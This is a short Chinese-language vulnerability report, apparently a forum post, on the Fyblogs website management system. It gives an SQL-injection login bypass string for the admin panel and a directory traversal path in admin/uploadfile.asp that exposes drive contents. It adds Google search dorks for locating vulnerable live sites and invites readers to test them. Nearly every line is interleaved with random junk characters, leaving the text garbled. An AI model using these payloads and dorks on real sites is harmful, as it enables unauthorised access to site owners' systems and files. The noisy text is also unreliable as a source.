漏洞类型: 未授权访问/权限绕过/ L1 {. D8 y/ a7 ?5 v: ^0 y& }
7 |0 P; U1 K: o简要描述:
. U/ f E9 r! O8 I l5 E
* B9 K5 D. n( n" ?2 fFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% j+ d9 m8 d; [+ `% ~! H0 A- r
# D4 X- e" G, |+ u, K' e详细说明:
9 S; r& I1 W* K% J3 g
0 i; i4 w' e; M! s1 n/ `! S后台万能密码 'or'='or'6 g6 {$ M6 Y9 ]8 ^2 Y* D0 K
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
% B- L I1 j) I2 ~admin/uploadfile.asp?currentFolder=/upfiles/../* l" L5 n( U# g
0 f1 {) m$ x6 K
漏洞证明:
- n) P# M2 @) f' v7 ^ p$ E: ~" g6 T" p% L4 {4 E! J5 O
谷歌:inurl:type.asp?id=1 新闻中心% N! A7 L g, f3 _; C& u2 k
或者 :inurl:download_ok.asp?
}1 `5 ~8 B' V$ J' Z( g! O3 @: |8 y
+ w- e+ ?- l% m: U: P2 p3 c可以测试- t4 Z" S' U9 T4 b/ p, t
. |4 T1 B6 H9 l: @/ {# ~
* w9 \5 L9 }. F7 ~9 o& {
|